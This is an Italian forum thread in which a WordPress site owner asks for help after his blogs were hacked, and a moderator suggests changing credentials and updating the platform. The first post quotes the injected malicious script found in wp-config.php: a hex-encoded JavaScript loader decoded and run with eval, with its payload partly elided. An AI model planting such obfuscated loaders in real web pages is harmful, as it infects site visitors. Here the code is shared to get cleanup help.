Torna indietro   Hardware Upgrade Forum > Networking e sicurezza > Antivirus e Sicurezza > Aiuto sono infetto! Cosa faccio?

OPPO Find X9 Pro: il camera phone con teleobiettivo da 200MP e batteria da 7500 mAh
OPPO Find X9 Pro: il camera phone con teleobiettivo da 200MP e batteria da 7500 mAh
OPPO Find X9 Pro punta a diventare uno dei riferimenti assoluti nel segmento dei camera phone di fascia alta. Con un teleobiettivo Hasselblad da 200 MP, una batteria al silicio-carbonio da 7500 mAh e un display da 6,78 pollici con cornici ultra ridotte, il nuovo flagship non teme confronti con la concorrenza, e non solo nel comparto fotografico mobile. La dotazione tecnica include il processore MediaTek Dimensity 9500, certificazione IP69 e un sistema di ricarica rapida a 80W
DJI Romo, il robot aspirapolvere tutto trasparente
DJI Romo, il robot aspirapolvere tutto trasparente
Anche DJI entra nel panorama delle aziende che propongono una soluzione per la pulizia di casa, facendo leva sulla propria esperienza legata alla mappatura degli ambienti e all'evitamento di ostacoli maturata nel mondo dei droni. Romo è un robot preciso ed efficace, dal design decisamente originale e unico ma che richiede per questo un costo d'acquisto molto elevato
DJI Osmo Nano: la piccola fotocamera alla prova sul campo
DJI Osmo Nano: la piccola fotocamera alla prova sul campo
La nuova fotocamera compatta DJI spicca per l'abbinamento ideale tra le dimensioni ridotte e la qualità d'immagine. Può essere installata in punti di ripresa difficilmente utilizzabili con le tipiche action camera, grazie ad una struttura modulare con modulo ripresa e base con schermo che possono essere scollegati tra di loro. Un prodotto ideale per chi fa riprese sportive, da avere sempre tra le mani
Tutti gli articoli Tutte le news

Vai al Forum
Rispondi
 
Strumenti
Old 11-10-2010, 17:39   #1
Fab_DM
Member
 
Iscritto dal: Dec 2009
Messaggi: 30
Sito attaccato da hacker: che fare?

ciao,
ho un sito su piattaforma Wordpress che gestisco e ho scoperto che sono stato vittima di hackers. Non potevo più accedervi a ricevevo un messaggio che diceva:

Parse error: syntax error, unexpected '<' in /home/mhd-01/wwww.xxxxx-yyyyyy.com/htdocs/wp-config.php on line 93.

Via FTP ho controllato il file wp-config.php ed ho trovato questo script:

<script type='text/javascript'>
var t="";var arr="646f63756d656e742e...2729";for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr[i]+arr[i+1],16));eval(t);
</script>

L'ho cancellato e sono riuscito a visualizzare di nuovo il mio sito ma il pannello di controllo di Wordpress presenta ancora dei problemi, lo visualizzo male, con una grafica sconclusionata per cui credo che il problema non sia risolto.
Ho effettuato la procedura di pulizia indicata qui e, log di hijackthis a parte da analizzare, non mi pare ci sia nulla di particolare nel mio pc. O meglio, prima Antivir mi ha rilevato un Trojan che è stato però eliminato adesso.
Se però il mio pc fosse davvero pulito ora credo che dovrei visualizzare il pannello di controllo di Wordpress correttamente e invece non è così.

Esiste un modo per vedere se nel mio sito è stato inserito qualche altro script da altre parti? Esiste qualche programma per analizzare il mio sito nello specifico invece che il mio pc?

Grazie in anticipo, ciao!

P.S.
Il servizio assistenza del mio hosting mi ha risposto così: "probabilmente ha qualche script nel sito che ha dei BUG che hanno consentito la modifica della pagina. Consigliamo di fare controlli in tal senso." Appunto, come posso fare controlli in tal senso??

Ultima modifica di Fab_DM : 11-10-2010 alle 18:16.
Fab_DM è offline   Rispondi citando il messaggio o parte di esso
Old 11-10-2010, 17:53   #2
Chill-Out
Moderatore
 
L'Avatar di Chill-Out
 
Iscritto dal: Jun 2007
Città: 127.0.0.1
Messaggi: 25885
Ciao, sistema il tuo post sballa il layout del forum e riporta l'indirizzo del sito in modo e maniera che non sia cliccabile, grazie.
__________________
Try again and you will be luckier.
Chill-Out è offline   Rispondi citando il messaggio o parte di esso
Old 11-10-2010, 18:17   #3
Fab_DM
Member
 
Iscritto dal: Dec 2009
Messaggi: 30
Quote:
Originariamente inviato da Chill-Out Guarda i messaggi
Ciao, sistema il tuo post sballa il layout del forum e riporta l'indirizzo del sito in modo e maniera che non sia cliccabile, grazie.
ciao, scusa ho editato. Se c'è ancora qualche problema fammi sapere che provvedo!
Fab_DM è offline   Rispondi citando il messaggio o parte di esso
Old 11-10-2010, 18:42   #4
Chill-Out
Moderatore
 
L'Avatar di Chill-Out
 
Iscritto dal: Jun 2007
Città: 127.0.0.1
Messaggi: 25885
Quote:
Originariamente inviato da Fab_DM Guarda i messaggi
ciao, scusa ho editato. Se c'è ancora qualche problema fammi sapere che provvedo!
Tutto ok, ma hai dimenticato di riportare il sito.
__________________
Try again and you will be luckier.
Chill-Out è offline   Rispondi citando il messaggio o parte di esso
Old 11-10-2010, 19:56   #5
Fab_DM
Member
 
Iscritto dal: Dec 2009
Messaggi: 30
Quote:
Originariamente inviato da Chill-Out Guarda i messaggi
Tutto ok, ma hai dimenticato di riportare il sito.
ah no, l'ho eliminato apposta pensando che non si potesse postare!
Anche perchè pensavo bastasse postare lo script fondamentalmente.

Il sito è wwww.health-bodytips.com

L'ho reso non cliccabile, fammi sapere se va bene così!

Grazie!

edit.

ho appena riscontrato lo stesso problema in un altro sito che ho e usavo come prova.
Siccome ho anche altri siti oltre a questi 2, notavo il fatto che, per ora, ho riscontrato questo problema con 2 blog Wordpress che hanno lo stesso hosting service. Un altro blog Wordpress che ho, con un altro hosting, per ora non presenta alcun problema di questo tipo.
Non so se c'entri l'hosting comunque ma volevo riportarlo.
Spero che qualcuno mi sappia dare una mano a capire

Ultima modifica di Fab_DM : 12-10-2010 alle 01:59.
Fab_DM è offline   Rispondi citando il messaggio o parte di esso
Old 12-10-2010, 23:18   #6
Fab_DM
Member
 
Iscritto dal: Dec 2009
Messaggi: 30
nessuno ha mai avuto problemi di questo tipo?
Fab_DM è offline   Rispondi citando il messaggio o parte di esso
Old 13-10-2010, 09:44   #7
Chill-Out
Moderatore
 
L'Avatar di Chill-Out
 
Iscritto dal: Jun 2007
Città: 127.0.0.1
Messaggi: 25885
Quote:
Originariamente inviato da Fab_DM Guarda i messaggi
nessuno ha mai avuto problemi di questo tipo?
Ciao, controllato ieri, non ho visto nulla di anomalo.
__________________
Try again and you will be luckier.
Chill-Out è offline   Rispondi citando il messaggio o parte di esso
Old 13-10-2010, 15:18   #8
Fab_DM
Member
 
Iscritto dal: Dec 2009
Messaggi: 30
Quote:
Originariamente inviato da Chill-Out Guarda i messaggi
Ciao, controllato ieri, non ho visto nulla di anomalo.
Ciao, grazie per la risposta!
Purtoppo il pannello di controllo del sito (wordpress) ha una grafica completamente sballata per cui penso ci sia ancora qualcosa che non va.
Ho scoperto che anche un altro blog che ho è stato attaccato ma questo sembra irrecuperabile. Se hai voglia di dargli uno sguardo è wwww.ioinformo.it.
Non riesco più ad accedere

grazie, ciao!
Fab_DM è offline   Rispondi citando il messaggio o parte di esso
Old 13-10-2010, 18:41   #9
Chill-Out
Moderatore
 
L'Avatar di Chill-Out
 
Iscritto dal: Jun 2007
Città: 127.0.0.1
Messaggi: 25885
Quote:
Originariamente inviato da Fab_DM Guarda i messaggi
Ciao, grazie per la risposta!
Purtoppo il pannello di controllo del sito (wordpress) ha una grafica completamente sballata per cui penso ci sia ancora qualcosa che non va.
Ho scoperto che anche un altro blog che ho è stato attaccato ma questo sembra irrecuperabile. Se hai voglia di dargli uno sguardo è wwww.ioinformo.it.
Non riesco più ad accedere

grazie, ciao!
Nulla di anomalo, comunque la prima cosa da fare è cambiare le credenziali ed aggiornare la piattaforma su cui si appoggia il sito.
__________________
Try again and you will be luckier.

Ultima modifica di Chill-Out : 14-10-2010 alle 00:09.
Chill-Out è offline   Rispondi citando il messaggio o parte di esso
Old 15-10-2010, 01:52   #10
Fab_DM
Member
 
Iscritto dal: Dec 2009
Messaggi: 30
Quote:
Originariamente inviato da Chill-Out Guarda i messaggi
Nulla di anomalo, comunque la prima cosa da fare è cambiare le credenziali ed aggiornare la piattaforma su cui si appoggia il sito.
Ciao, la piattaforma ho provato ad aggiornarla via ftp in quanto dal pannello di controllo non si riesce.
Ho sovrascritto tutti i file tranne la cartella content e il file config.php.
Risultato: tutto come prima.
Ed ogni volta che vi accedo il mio antivirus mi blocca un trojan...
Ma c'è un modo per fare una scansione antivirus al mio sito??
Fab_DM è offline   Rispondi citando il messaggio o parte di esso
Old 15-10-2010, 15:29   #11
Chill-Out
Moderatore
 
L'Avatar di Chill-Out
 
Iscritto dal: Jun 2007
Città: 127.0.0.1
Messaggi: 25885
Quote:
Originariamente inviato da Fab_DM Guarda i messaggi
Ed ogni volta che vi accedo il mio antivirus mi blocca un trojan...
Mi alleghi il log su uno dei Server remoti indicati nelle Regole di sezione in firma.
__________________
Try again and you will be luckier.
Chill-Out è offline   Rispondi citando il messaggio o parte di esso
Old 15-10-2010, 15:47   #12
zabb
Senior Member
 
L'Avatar di zabb
 
Iscritto dal: Jul 2005
Città: Firenze
Messaggi: 3598
edit
zabb è offline   Rispondi citando il messaggio o parte di esso
Old 15-10-2010, 19:44   #13
Fab_DM
Member
 
Iscritto dal: Dec 2009
Messaggi: 30
Quote:
Originariamente inviato da Chill-Out Guarda i messaggi
Mi alleghi il log su uno dei Server remoti indicati nelle Regole di sezione in firma.
ciao, Antivir non mi dà un vero e proprio log per cui ti allego gli screenshot di ciò che ha rilevato, sperando che siano utili.
Grazie in anticipo!

antivir.jpg

antivir_1.png
Fab_DM è offline   Rispondi citando il messaggio o parte di esso
Old 15-10-2010, 23:42   #14
Chill-Out
Moderatore
 
L'Avatar di Chill-Out
 
Iscritto dal: Jun 2007
Città: 127.0.0.1
Messaggi: 25885
Quote:
Originariamente inviato da Fab_DM Guarda i messaggi
ciao, Antivir non mi dà un vero e proprio log per cui ti allego gli screenshot di ciò che ha rilevato, sperando che siano utili.
Grazie in anticipo!

antivir.jpg

antivir_1.png
Parliamo di questo health-bodytips ?
__________________
Try again and you will be luckier.
Chill-Out è offline   Rispondi citando il messaggio o parte di esso
Old 16-10-2010, 00:26   #15
Fab_DM
Member
 
Iscritto dal: Dec 2009
Messaggi: 30
Quote:
Originariamente inviato da Chill-Out Guarda i messaggi
Parliamo di questo health-bodytips ?
sì questi sono stati rilevati connettendomi alla homepage health-bodytips prima e al pannello admin di wordpress poi.
Per conoscenza, mi è successo in alcuni casi di ricevere gli stessi avvisi connettendomi anche all'altro sito.
Fab_DM è offline   Rispondi citando il messaggio o parte di esso
Old 20-10-2010, 14:25   #16
Fab_DM
Member
 
Iscritto dal: Dec 2009
Messaggi: 30
nessuna novità?
Se cancello tutto via ftp e ricomincio il lavoro da zero, sono sicuro di aver tolto i virus?
Esiste un modo per evitare che qualcuno infili script nelle pagine dei siti internet?
Grazie
Fab_DM è offline   Rispondi citando il messaggio o parte di esso
Old 20-10-2010, 16:17   #17
Chill-Out
Moderatore
 
L'Avatar di Chill-Out
 
Iscritto dal: Jun 2007
Città: 127.0.0.1
Messaggi: 25885
Quote:
Originariamente inviato da Fab_DM Guarda i messaggi
nessuna novità?
Se cancello tutto via ftp e ricomincio il lavoro da zero, sono sicuro di aver tolto i virus?
Esiste un modo per evitare che qualcuno infili script nelle pagine dei siti internet?
Grazie
Ricontrollato, non risulta nulla, per evitare tutto eventuali iniezioni di codice i principali accordimenti sono, password robusta e piattaforma sempre aggiornata.
__________________
Try again and you will be luckier.
Chill-Out è offline   Rispondi citando il messaggio o parte di esso
Old 21-10-2010, 17:31   #18
Fab_DM
Member
 
Iscritto dal: Dec 2009
Messaggi: 30
Quote:
Originariamente inviato da Chill-Out Guarda i messaggi
Ricontrollato, non risulta nulla, per evitare tutto eventuali iniezioni di codice i principali accordimenti sono, password robusta e piattaforma sempre aggiornata.
ti ringrazio, per un altro sito ho messo una password molto complicata al database MySQL e spero basti.
Un'ultima cosa, c'è un modo in cui possa eventualmente fare io dei controlli in futuro per essere sicuro che nessuno si sia infilato nel mio sito? Giusto per non disturbarvi sempre nel forum, ogni volta che avessi un dubbio riguardo questo problema su uno dei miei siti.
Grazie ancora!
Fab_DM è offline   Rispondi citando il messaggio o parte di esso
 Rispondi


OPPO Find X9 Pro: il camera phone con teleobiettivo da 200MP e batteria da 7500 mAh OPPO Find X9 Pro: il camera phone con teleobiett...
DJI Romo, il robot aspirapolvere tutto trasparente DJI Romo, il robot aspirapolvere tutto trasparen...
DJI Osmo Nano: la piccola fotocamera alla prova sul campo DJI Osmo Nano: la piccola fotocamera alla prova ...
FUJIFILM X-T30 III, la nuova mirrorless compatta FUJIFILM X-T30 III, la nuova mirrorless compatta
Oracle AI World 2025: l'IA cambia tutto, a partire dai dati Oracle AI World 2025: l'IA cambia tutto, a parti...
Kia PV5: è record di autonomia! I...
L'aeroplano supersonico ''silenzioso'' N...
Nissan: le batterie allo stato solido co...
NVIDIA cambia strategia? La GPU Feynman ...
Signal respinge le accuse dopo il down A...
Uragano Melissa in arrivo: la tempesta d...
8K o 4K? Ecco perché il tuo occhi...
Mercato auto europeo in crescita nei pri...
Addio SSD e RAM, benvenuti funghi: dagli...
TCL Q6C: tecnologia e design per un TV c...
Corsair MP700 PRO XT al debutto: un SSD ...
Apple Watch Ultra 2 in titanio con GPS +...
Nuova protezione per Windows 11: scansio...
GoPro LIT HERO a 249€ su Amazon: la nuov...
PayPal integra i pagamenti in ChatGPT: c...
Chromium
GPU-Z
OCCT
LibreOffice Portable
Opera One Portable
Opera One 106
CCleaner Portable
CCleaner Standard
Cpu-Z
Driver NVIDIA GeForce 546.65 WHQL
SmartFTP
Trillian
Google Chrome Portable
Google Chrome 120
VirtualBox
Tutti gli articoli Tutte le news Tutti i download

Strumenti

Regole
Non Puoi aprire nuove discussioni
Non Puoi rispondere ai messaggi
Non Puoi allegare file
Non Puoi modificare i tuoi messaggi

Il codice vB è On
Le Faccine sono On
Il codice [IMG] è On
Il codice HTML è Off
Vai al Forum


Tutti gli orari sono GMT +1. Ora sono le: 19:31.


Powered by vBulletin® Version 3.6.4
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.
Served by www3v